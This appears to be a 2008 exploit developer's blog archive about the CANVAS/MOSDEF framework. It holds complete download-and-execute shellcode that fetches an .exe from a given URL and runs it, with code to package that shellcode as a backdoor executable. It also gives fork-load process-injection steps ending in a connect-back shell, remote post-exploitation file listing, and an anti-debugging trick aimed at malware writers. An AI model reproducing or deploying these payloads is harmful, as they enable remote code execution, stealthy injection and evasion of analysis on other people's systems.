lunes, 25 de agosto de 2008

That little thing called MOSDEF


In a previous post, I gave a small review of the concept behind MOSDEF. I explained that is a runtime C compiler written in Python that builds shellcode for a bunch of architectures/os and that it was used on CANVAS as a post-explotation platform.

Recently I have been writing a file browser. It's a simple task (specially if you have GUI skills, which I don't) and it has the advantage of showing all the potential that MOSDEF can bring to your framework, more over if you compare it with an RPC-based.

For the file-browser, I had to make to obviously list directories (a feature with luckily already had). In an RPC environment, you will have to something like this:

hFind = call("kernel32.dll!FindFirstFile", dir, &FindFileData) print FindFileData.cFileName while call("kernel32.dll!FindNextFile" hFind, &FindFileData) != 0: print FindFileData.cFileName

(In a *nix environment, you will need to system calls, getdents and stat)

It does look nice, but for each file in the directory you have the latency of the remote call been sent and the result returned over the wire (think about as your target on the the remote forests of Xi'an).

Now, in the case of MOSDEF what you need to do is a small C file that does the same thing as python, something like this:

vars={}
vars["dir"]=dir
code="""
#import "string","dir" as "dir"
#import "local","sendstring" as "sendstring"
#import "local","sendint" as "sendint"

#import "remote", "kernel32.dll|FindFirstFileA" as "FindFirstFile"

#import "remote", "kernel32.dll|FindNextFileA" as "FindNextFile"

#import "remote", "kernel32.dll|GetLastError" as "GetLastError"

struct FILETIME {
int dwLowDateTime; int dwHighDateTime; };
struct WIN32_FIND_DATA {
int dwFileAttributes;

struct FILETIME ftCreationTime;
struct FILETIME ftLastAccessTime;
struct FILETIME ftLastWriteTime;

int nFileSizeHigh; int nFileSizeLow;
int dwReserved0;
int dwReserved1;

char cFileName[260];

char cAlternateFileName[14];
};

void sendFILETIME(struct FILETIME *ft) {
sendint(ft->dwLowDateTime);

sendint(ft->dwHighDateTime);

}


void main() {
struct WIN32_FIND_DATA FindFileData;
int hFind;
int Error;
hFind = -1;
hFind = FindFirstFile(dir, &FindFileData);
if(hFind == -1) {
// We send a -1 mean there is no more file to sent
sendint(-1);
Error=GetLastError();
sendint(Error);
return 0;

} else {
sendint(FindFileData.dwFileAttributes);
sendint(FindFileData.nFileSizeLow);
sendFILETIME(&FindFileData.ftLastWriteTime);
sendstring(FindFileData.cFileName);
}

while (FindNextFile(hFind, &FindFileData) != 0) {
sendint(FindFileData.dwFileAttributes);
sendint(FindFileData.nFileSizeLow);
sendFILETIME(&FindFileData.ftLastWriteTime);
sendstring(FindFileData.cFileName);
}

Error = GetLastError();
sendint(-1);
sendint(Error); // IF ERROR_NO_MORE_FILE everything works ok :>
}

"""
self.clearfunctioncache()
request=self.compile(code, vars)
self.sendrequest(request)
countfile=0

files=[]

while 1:
attr = sint32(self.readint())
[...]

Before you mention it or you even think about it, yes, we called "Cripple C" for a good reason.
Anyways, as you imagine, this code gets compiled on your computer and it remotely resolve the addresses of the function needed. Here is the normal output you will see:

Dodir: C:\ kernel32.dll|FindFirstFileA not in cache - retrieving remotely. Getprocaddr_withmalloc: Found kernel32.dll|FindFirstFileA at 7c813559 kernel32.dll|FindNextFileA not in cache - retrieving remotely. Getprocaddr_withmalloc: Found kernel32.dll|FindNextFileA at 7c839019 kernel32.dll|GetLastError not in cache - retrieving remotely. Getprocaddr_withmalloc: Found kernel32.dll|GetLastError at 7c910331

Once MOSDEF had all the address in its cache, it send the piece of code which gets executed, after that just wait for the requested information to came back parsed and ready to be used on your application.

Here is the scoop:



Note: Yes, sometimes I do this kind of job.

jueves, 21 de agosto de 2008

Shellcode: You are doing it CORRECT


Recently I've been doing a lot of shellcode writing due some special needs we had for some exploits (Check post "Apology of forking shellcodes").

One of the things that get me excited about, other than finishing the citrix_metaframe bug, is the redesign of the shellcode framework that Bas did for the last release. The system is pretty simple to use and extend (I add myself a couple of features).

Instead of explaining the obvious, let me show you how it works with a simple example, a small download to IE cache and execute shellcode.

As most of you know, CANVAS use MOSDEF a runtime compiler for a bunch of different operating system and architecture (Linux x86, Linux SPARC, Linux PPC, Solaris SPARC, Solaris Intel, BSD, AIX, Win32, OSX x86, OSX PPC, etc). Explainning all the MOSDEF details it can take a long time and I usually enjoy my sleeping. Let go with some basics: MOSDEF is a C compiler writting in Python, so that means that it has a sintax parser, an intermediate language, an assembly compiler, etc. In this case we are gonna use the assembler to compile our shellcode.

Let's start from the begging, the main class for shellcoding is basecode:

def httpcachedownload(self, urlfile):

codegen = basecode()

Once we had a basecode object, we need to tell it what would be the win32 api functions that we are gonna need. This basically would add a special stub that would resolve each of those function before our shellcode is executing. (Function resolving is been done by going through the PEB, checking the loaded dlls and comparing strings names).

codegen.find_function("kernel32.dll!loadlibrarya")
codegen.find_function("kernel32.dll!createprocessa")
codegen.find_function("kernel32.dll!exitthread")

Obviously, kernel32.dll is always loaded, but there are api function which are not always loaded, such is the case of UrlDownloadtoCacheFileA inside urlmon.dll which is the function that is gonna do all the work from us. So what we need to do is, at resolving time, Loadlibrary urlmon.dll and later resolve UrlDownloadtoCacheFileA. Sounds hard, but is obviously simple with MOSDEF:

codegen.load_library('urlmon.dll')
codegen.find_function("urlmon.dll!urldownloadtocachefilea")

We had all our resolved hashesh created, now we want to send an "argument" to our shellcode, for this special case we will need the name of the url where our .exe would be. So we are gonna add a global variable named URLNAME and we will pass our url:

codegen._globals.addString("URLNAME", urlfile)

Now we need the actual code. Yeah, its an simple framework, but we cannot escape for coding the actual assembly:

codegen.main = """
xorl %eax, %eax
mov $0x208, %edx
//movl %ecx, %edx
sub %edx, %esp
movl %esp, %esi

leal URLNAME-getpcloc(%ebp),%edi // Note how simple we load the
// given argument
pushl %esi
// BATCHCODE
// ------

pushl %eax // pBSC
pushl %eax // dwReserved
pushl %edx // dwBufLength
pushl %esi // szFileName
pushl %edi // URL
pushl %eax // lpUnkCaller
call URLDOWNLOADTOCACHEFILEA-getpcloc(%ebp) // Calling a function
// needs the name
// with caps.
//returns a HFILE handle

pop %esi // get the file back

xorl %eax, %eax
movl $0x100, %ecx
subl %ecx, %esp
movl %esp, %edi // CLEAR the buffer
rep stosb

leal 16(%esp), %ecx
leal 84(%esp), %edx
mov $0x1, 0x2c(%edx)

pushl %ecx // PROCESS INFORMATION
pushl %edx // STARTUP INFO
pushl %eax
pushl %eax
pushl %eax // Creation Flag
pushl %eax
pushl %eax
pushl %eax
pushl %esi // command
pushl %eax
call CREATEPROCESSA-getpcloc(%ebp)
xorl %eax,%eax
pushl %eax
call EXITTHREAD-getpcloc(%ebp)
"""

Quite simple, isn't it? We call UrlDownloadtoCacheFileA with the given url, this would return the place where it saved the downloaded file on the szFileName argument (reg %esi) and later we simple call CreateProcessA.

Before i get any comment bitching about how this code can be optimized, I KNOW, i just didn't do it yet.

So the last thing we need return the assembly code formatted:

return codegen.get()


From your exploit, you can go like:

import shellcode.clean.windows.payloads as payloads
p = payloads.payloads()
code = p.httpdownload("http://172.16.71.2:8080/file.exe")
sc = p.assemble( code )

sc would have your shellcode. Now if you want to test it on a debugger without exploiting something or you just want to make a backdoor out of it:

import MOSDEF.pelib as pelib
myPElib = pelib.PElib()
exe = myPElib.createPEFileBuf(sc, gui=True)
file = open('test.exe', 'wb+')
file.write(exe)
file.close()


Peace

domingo, 17 de agosto de 2008

thing you care if you are writing malware...


There are million of ways to detect a debugger. I'm usually on the other side, "millions of ways to hide a debugger", but this time let me show you a simple but neat trick.
Call the win32 api function GetCommandLine and check if the last char is a space.
If it isn't, means its been executed from a debugger (tested on ID and windbg) or the command shell.


LPSTR ptr;
unsigned int ret;

ptr = GetCommandLine();
ret = strlen(ptr);
if(ptr[ret-1] == ' ')
printf("Carry On\n");
else
printf("Debugger detected!\n");

In other news, if you feel like having a good cabernet sauvignon, a juicy steak or listening to hackers talking about what they know Buenos Aires is your place the first days of October:
cansecwest's dragos is throwing a conference this year: Ba-Con
And exactly the day after, the second edition of the Eko-party including Dave Aitel as a keynote "Hacking Has An Economy of Scale" and Pablo Solé recon talk "Adobe javascript unleashed".

I'll be around!

viernes, 15 de agosto de 2008

deep deep...

What's lower than stealing a bug from someone and publish it?

Stealing a NULL pointer read...

http://www.nullcode.com.ar/ncs/crash/nsloo.htm*

You must be starving for fame, go fuzz an AV!


* The bug on that website was found by raddy long time ago

jueves, 7 de agosto de 2008

The exploit development's moebius strip

Let me talk a little about one of my main tasks at Immunity: solving
complex problems. Solving complex problems is an important and interesting job, specially for
some curious mind that enjoy the masochistic task of facing difficult
challenges every day.


On the opposite side of all the excitement described you go through a series
of moods on the different steps of the problem, which i had named the
"the exploit development's circle"...

EXCITEMENT: It begin with excitement about the new challenge you will be facing. You set up your environment and start getting familiar with all the details.

DECEPTION: With all the adrenaline flowing through your vein, your face hits directly into a wall . The challenge seems to be more complex than expected and all the common hopes of succeed get lower every minute.

DEPRESSION: After days of failure and using all your experience and your brain cells, the exploit remains exactly the same as the first day. The adrenaline in the blood is replaced by epic amounts of caffeine, you go to sleep and all you can think of is the time spent on a bug that might not be able to exploit it.

FAITH: You tell your boss this is impossible, that we need to switch into something else. He persistently gave you support but your ears are so occupied listening to your psychological repression mechanism telling you how bad you are at this and that you should apply for a job that requires less mental effort such as a clerk in your local video store. A millisecond before quitting this module for good , an idea emerge, you are not certain where it came from, maybe it was a signal sent by the old thyresias that you predict subconsciously with pigeon's flight from your windows or your last neuron burning the last portion of energy left, but the true is that your idea might work.

SUCCESS: It Work! Your last minute theory Works. All the glory, the little pieces of colorful paper dancing in the air, the clowns, the trumpets. Your exploit is working and the cold sweat is now gone. After all the congratulations, your self-steem is over the clouds and the routine testing (which you know they gonna work successfuly) your 15 minutes of glory will be long gone and the next task will bring the circle back to where it start.


martes, 5 de agosto de 2008

Apology of forking shellcode

*Note: To practice my writing i will start doing random post in english, most of them related with computers.*

I remember back in the time, when Dave was trying to chill-out from a hard day of work he start to do a simple "half and hour" hoolio (In Immunity's slang, hoolio is an exploit for bizarre software, named after -Julio FTP Server-), and so he start do savant. For those who never exploit, it takes a bit more than half-and-hour. Refer to Advance Stack Overflow.


The last thing I did, is fully port the neat exploit that Brett Moore did for Syscan to CANVAS, its a really interesting bug and a good proof of concept for windows 2003 explotation (Since today, we are gonna include it on the Heap overflow trainning). I'm not gonna get into the details since Brett cover them all up, i just wanna state that is a nice bug and with some work it can be exploit it quite reliable. The problem was different this time: Shellcode.

The great problem on shellcode execution is that the heap is screwed by whatever primitive you use, so it will eventually gonna crash on an allocation. It can be fixed, but you will never be 100% sure that you did it correctly, and probably you will end up with a big shellcode.

Our usual response to this problem is -Process Injection-, Bas (also known as The great Bas Alberts) wrote a great shellcode a couple of years ago, which inject mosdef shellcode into whatever process is given and execute the connect back. We tag-team a little bit on this exploit before he left to reduce shellcode size (since I only had around 0x300 bytes).

I did all of this without checking the thread privilege (kids, dont do that at home, we are security professional trained to do such dumb mistakes), so when i run my exploit nothing significant happens.

Since I believe in science, i look for the causes, and this time i found out the worst: I didn't have the SeDebugPrivilige. Usually is disable, and you can easily enable with a couple of lines of assembly, but this time it was not there. In simple words:
Good bye Inject shellcode, Welcome trouble.

Next step, ForkLoad shellcode. We had a template of what is supposed to be fork shellcode, but it was never finished, and so it was my task for the last couple of days. (sheesh, I did all this write up to get into this point).

In 2003 the Last Stage of Delirium group release a paper on win32 shellcode, which between other amazing tricks they talk about a Fork Load shellcode, they made it look simple:

1) Create the process in Suspended Mode

STARTUPINFO si = {0}; PROCESS_INFORMATION pi;
CONTEXT ctx;
CreateProcess(NULL, "cmd", NULL, NULL, 0, CREATE_SUSPENDED, NULL, &si, π);

2) Get Full context of the main thread

ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext( pi.Thread, &ctx);

3) Remote VirtualAllocate and Write our shellcode there.

v = VirtualAllocEx( pi.hProcess, NULL, 0x5000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory( pi.hProcess, v, buf, sizeof(buf), NULL);

4) Make the thread EIP points to our shellcode

ctx.ContextFlags = CONTEXT_FULL;
ctx.Eip = v;
SetThreadContext( pi.hThread, &ctx);

5) Since the thread is in SUSPENDED MODE, resume execution

ResumeThread(pi.hThread);


The shellcode injected will work perfectly, as far as it does simple things. You will have kernel32.dll and ntdll.dll loaded (but not initialized), so depending what shellcode do you might end up on a crash on non-initialized critical section usage or other similar behaviour.

To fix it, we have to do a couple of tweaks. Let me show you some code:

1) You need to distinguished where you are the forking or the forked process, we did that with a simple self-modifying code:

forkentry:
// if this marker is cleared this jmps to forkthis:
// we copy this entire payload over ;)
xorl %eax, %eax
incl %eax
test %eax,%eax
jz forkthis

// start of self modifying muck

// Self modifying code, change the incl for a nop
leal forkentry-getpcloc(%ebp),%ecx
movb $0x90, 2(%ecx) // 2(%ecx) points to the incl %eax

2) CreateProcess in suspended-mode

CreateProcess(NULL, "cmd", NULL, NULL, 0, CREATE_SUSPENDED, NULL, &si, π);

3) Remote VirtualAllocate and Write our shellcode there.

v = VirtualAllocEx( pi.hProcess, NULL, 0x5000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory( pi.hProcess, v, buf, sizeof(buf), NULL);

4) Get Full context of the main thread

ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext( pi.Thread, &ctx);

5) Create a Remote Thread and run it

CreateRemoteThread( hProcess, 0, 0, shellcode, 0, 0,0)

6) Resume the main thread execution of the main thread.

// pi.hThread
pushl %esi
call RESUMETHREAD-getpcloc(%ebp)

7a) If you are forking, exitthread

xorl %eax,%eax
pushl %eax
call EXITTHREAD-getpcloc(%ebp)

7b) If you are forked, sleep for one second to let the main thread initialize everything

kernel32.dll!Sleep( 0x1000)


And that takes around 0x2cd bytes (It can be optimized), including:
- LoadLibrary("WS2_32.dll")
- Resolving WS2_32.dll!wsastartup and calling it
- and including the first-stage mosdef shellcode (socket/connect/recv).


All the kudos for Bas and his recently re-write of our shellcode framework making this smoother experience.